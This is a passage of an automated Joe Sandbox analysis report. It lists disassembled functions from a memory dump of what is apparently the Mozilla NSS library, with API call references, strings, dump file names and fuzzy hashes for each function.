Function 6C6DA910 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

/G6/, xrefs: 6C6DA919

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID:
String ID: /G6/
API String ID: 0-570549270
Opcode ID: 8ec66085ca8ad4300aaf6f59694f62f15d5a45cfdba95a37da4501494a6f68c0
Instruction ID: 85b30a663bac83fab3530df01656091fd3e77a8589c99e6523e1d72f180d383f
Opcode Fuzzy Hash: 8ec66085ca8ad4300aaf6f59694f62f15d5a45cfdba95a37da4501494a6f68c0
Instruction Fuzzy Hash: 1B91B171708200CFEF249FA5E989B6A37B5BB86309F09113DE54747A42DB38A845CBD5

Function 6C6C4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6C51BB

Strings

%s at line %d of [%.10s], xrefs: 6C6C51B4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6C51A5
misuse, xrefs: 6C6C51AF
unable to delete/modify user-function due to active statements, xrefs: 6C6C51DF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 0bfc6f12b4d5a403271764a3eb5d44d51c2c4aedc1423c0ad8ee526a4a887b6b
Instruction ID: a9c05e20cd62c4311e1bde02e27367e635627d5a2892bfd46794b86b09c29ed0
Opcode Fuzzy Hash: 0bfc6f12b4d5a403271764a3eb5d44d51c2c4aedc1423c0ad8ee526a4a887b6b
Instruction Fuzzy Hash: 9F719CB170420A9BEB00CE15CD84BEA77B5FB88318F044524FD19DBB81D735E854DBA6

Function 6C75C9E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6C75CA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6C75CA35
PR_Unlock.NSS3(00000000), ref: 6C75CA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6C75CA77
PR_Unlock.NSS3(00000000), ref: 6C75CAFC

Strings

/G6/, xrefs: 6C75C9EF

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID: /G6/
API String ID: 1974170392-570549270
Opcode ID: 46433a8042efe868a89e8f0274df33858904de513100793c15e8bac3c2e8cca4
Instruction ID: fb433fbeb2111b9fa5a94a51d914c074ca40d848a2a1acaaeead815ffa25da09
Opcode Fuzzy Hash: 46433a8042efe868a89e8f0274df33858904de513100793c15e8bac3c2e8cca4
Instruction Fuzzy Hash: 1741D079E002059BEB00EF68DA45BAA7BB4BF49389F544024ED1897701EF30E921CBD1

Function 6C756980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 6C755DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755DEC
Part of subcall function 6C755DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C755E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7569BA

Part of subcall function 6C79FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C749003,?), ref: 6C79FD91
Part of subcall function 6C79FD80: PORT_Alloc_Util.NSS3(A4686C7A,?), ref: 6C79FDA2
Part of subcall function 6C79FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7A,?,?), ref: 6C79FDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C756A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C756AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C756ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C756AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C756AE9

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: b36e76f82e6b8d137af5461e8820e3b85ae7906602ebbd0e7058a2c28ba0b2ff
Instruction ID: 3a5a4fede98a43263f38f393bf7cba32dc18c5fd5f20928557123c0748b52fe0
Opcode Fuzzy Hash: b36e76f82e6b8d137af5461e8820e3b85ae7906602ebbd0e7058a2c28ba0b2ff
Instruction Fuzzy Hash: 2541B1B56406009BEB209F64ED49B9B77E9BF84314F188438E85AC7341EF35E921C7E1

Function 6C786AE0 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C786910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C786943
Part of subcall function 6C786910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C786957
Part of subcall function 6C786910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C786972
Part of subcall function 6C786910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C786983
Part of subcall function 6C786910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7869AA
Part of subcall function 6C786910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7869BE
Part of subcall function 6C786910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7869D2
Part of subcall function 6C786910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7869DF
Part of subcall function 6C786910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C786A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?,00000000,00000000), ref: 6C786B66
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?,00000000,00000000), ref: 6C786B88
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?,00000000,00000000), ref: 6C786BAF
free.MOZGLUE(00000000,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?,00000000,00000000), ref: 6C786BE6
free.MOZGLUE(?,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?,00000000,00000000), ref: 6C786BF7
free.MOZGLUE(6C78781D,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?,00000000,00000000), ref: 6C786C08

Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C78781D,00000000,6C77BE2C,?,6C786B1D,?,?,?,?,00000000,00000000,6C78781D), ref: 6C786C40
Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C78781D,?,6C77BE2C,?), ref: 6C786C58
Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C78781D), ref: 6C786C6F
Part of subcall function 6C786C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C786C84
Part of subcall function 6C786C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C786C96
Part of subcall function 6C786C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C786CAA

Strings

/G6/, xrefs: 6C786AEC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: strcmpstrncmp$FlagL_strncasecmpfree$Strip$ParameterSecureSkip
String ID: /G6/
API String ID: 3779992554-570549270
Opcode ID: 673c63082a24166de5ff1be2c7d941b06b931ec5d3a078db3590ef944699f850
Instruction ID: 3f11ff461ae50f3b226a181ad7c135b06133a91c5e61f4dc605eb0b63368b03a
Opcode Fuzzy Hash: 673c63082a24166de5ff1be2c7d941b06b931ec5d3a078db3590ef944699f850
Instruction Fuzzy Hash: 654186B5E12219ABEF10CFA9CA44B9EBBF4AF0574CF240435DA14E7640E735EA44C7A1

Function 6C768C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C768C7C

Part of subcall function 6C809DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DC6
Part of subcall function 6C809DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DD1
Part of subcall function 6C809DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C809DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C768CB0
TlsGetValue.KERNEL32 ref: 6C768CD1
EnterCriticalSection.KERNEL32(?), ref: 6C768CE5
PR_Unlock.NSS3(?), ref: 6C768D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C768D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C768D93

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 41b752d6b8f5089f583f57a047e341c4b0c3e0213ea8f4494b3e0689737d4547
Instruction ID: 2fbe542aebba08f2e4e68a26ef2aedf3ebcf4b363bfa5e07bd54aed1662eda98
Opcode Fuzzy Hash: 41b752d6b8f5089f583f57a047e341c4b0c3e0213ea8f4494b3e0689737d4547
Instruction Fuzzy Hash: 1B316871A00201AFEB109F6ADE4979AB7B4BF5A318F140136EE1967F90D770AD24C7E1

Function 6C7549C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6C754860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C754894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C756361,?,?,?), ref: 6C754A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C756361,?,?,?), ref: 6C754AD0

Strings

acul, xrefs: 6C754AB4
^jul, xrefs: 6C7549C5
/G6/, xrefs: 6C7549CF
acul, xrefs: 6C7549FB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: /G6/$^jul$acul$acul
API String ID: 1982233058-3420314952
Opcode ID: 1d4a2f469afa7b8d05b6a3774ad2aabfb7dda6efc888f7e50b9a6596ea7d6128
Instruction ID: e4f9b7858ab21a20875554acb65649b0a8ec8607ac3be6e2ad207cd1ea1698bf
Opcode Fuzzy Hash: 1d4a2f469afa7b8d05b6a3774ad2aabfb7dda6efc888f7e50b9a6596ea7d6128
Instruction Fuzzy Hash: F5310839A0410587FB508B59DE94B6E7225FB82318FA04A3AD515B7BC0CE349C70A7DA

Function 6C762E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C75E728,?,00000038,?,?,00000000), ref: 6C762E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C762E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C762E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C762E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C762E9E
PR_Unlock.NSS3(?), ref: 6C762EAB
PR_Unlock.NSS3(?), ref: 6C762F0D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 93b53393dd06244347a2e89f76d4435b2f7c181c8de6333abd359b5164d67ec1
Instruction ID: fb5e859099fc38671ffb8d5572460a9caa69a1056cb74b74cfbef2989169c1c9
Opcode Fuzzy Hash: 93b53393dd06244347a2e89f76d4435b2f7c181c8de6333abd359b5164d67ec1
Instruction Fuzzy Hash: 5631F676A00505ABEB019F29DD4C8AAB779EF5535CB448174EC08C7B12EB31EC64C7D0

Function 6C754B00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C754B66
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C754B7D
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C754B97
PORT_ZAlloc_Util.NSS3(00000018), ref: 6C754BB7

Part of subcall function 6C7A0D30: calloc.MOZGLUE ref: 6C7A0D50
Part of subcall function 6C7A0D30: TlsGetValue.KERNEL32 ref: 6C7A0D6D

Strings

/G6/, xrefs: 6C754B0B
, xrefs: 6C754B8A

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: AlgorithmPolicy$Alloc_ErrorUtilValuecalloc
String ID: $/G6/
API String ID: 4087055539-2796143049
Opcode ID: cf288c9ccf62853fbc864da3550603df4edfe7482fe6b463ce802a32e637ff9e
Instruction ID: 3bb475a8082f4928ac12303811f47ed59916f1077cdc99c5d3190e5ec288858b
Opcode Fuzzy Hash: cf288c9ccf62853fbc864da3550603df4edfe7482fe6b463ce802a32e637ff9e
Instruction Fuzzy Hash: 35213B71D002495BDF108B599E45BBFBBB4AF4031CFA00635F52596AC1FF209538D7A2

Function 6C7ACEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C7ACD93,?), ref: 6C7ACEEE

Part of subcall function 6C7A14C0: TlsGetValue.KERNEL32 ref: 6C7A14E0
Part of subcall function 6C7A14C0: EnterCriticalSection.KERNEL32 ref: 6C7A14F5
Part of subcall function 6C7A14C0: PR_Unlock.NSS3 ref: 6C7A150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7ACD93,?), ref: 6C7ACEFC

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7ACD93,?), ref: 6C7ACF0B

Part of subcall function 6C7A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7ACD93,?), ref: 6C7ACF1D

Part of subcall function 6C79FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB85
Part of subcall function 6C79FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C79FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7ACD93,?), ref: 6C7ACF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7ACD93,?), ref: 6C7ACF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C7ACD93,?,?,?,?,?,?,?,?,?,?,?,6C7ACD93,?), ref: 6C7ACF78

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 9d22575adb3bcb1b403fcaf489286aae24d9fa2d81eda372fe2139b6a5437c09
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: F311A5A6A00204ABF700ABE67E49B6B75EC9F5854EF044239EC09D7741FB61D909C6B1

Function 6C758C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C758C1B
EnterCriticalSection.KERNEL32 ref: 6C758C34
PL_ArenaAllocate.NSS3 ref: 6C758C65
PR_Unlock.NSS3 ref: 6C758C9C
PR_Unlock.NSS3 ref: 6C758CB6

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

Strings

KRAM, xrefs: 6C758C8F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: d563bfc8f3357d95c217f737c5393c9b3eae075015e7a0893ad00e1e173a9c1f
Instruction ID: fecfd23ed10d4d6fec8eca2555aaf753d193fdcc18e052c08e3e26795622013d
Opcode Fuzzy Hash: d563bfc8f3357d95c217f737c5393c9b3eae075015e7a0893ad00e1e173a9c1f
Instruction Fuzzy Hash: 28217CB1A556018FD700AF78C588559BBF4FF45308F4589AAD888CB712EB35D89ACB82

Function 6C74AD90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C743FFF,00000000,?,?,?,?,?,6C741A1C,00000000,00000000), ref: 6C74ADA7

Part of subcall function 6C7A14C0: TlsGetValue.KERNEL32 ref: 6C7A14E0
Part of subcall function 6C7A14C0: EnterCriticalSection.KERNEL32 ref: 6C7A14F5
Part of subcall function 6C7A14C0: PR_Unlock.NSS3 ref: 6C7A150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C743FFF,00000000,?,?,?,?,?,6C741A1C,00000000,00000000), ref: 6C74ADB4

Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A10F3
Part of subcall function 6C7A10C0: EnterCriticalSection.KERNEL32(?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A110C
Part of subcall function 6C7A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1141
Part of subcall function 6C7A10C0: PR_Unlock.NSS3(?,?,?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A1182
Part of subcall function 6C7A10C0: TlsGetValue.KERNEL32(?,6C748802,00000000,00000008,?,6C73EF74,00000000), ref: 6C7A119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C743FFF,?,?,?,?,6C743FFF,00000000,?,?,?,?,?,6C741A1C,00000000), ref: 6C74ADD5

Part of subcall function 6C79FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB85
Part of subcall function 6C79FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C79FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8694B0,?,?,?,?,?,?,?,?,6C743FFF,00000000,?), ref: 6C74ADEC

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C743FFF), ref: 6C74AE3C

Strings

/G6/, xrefs: 6C74AD9C

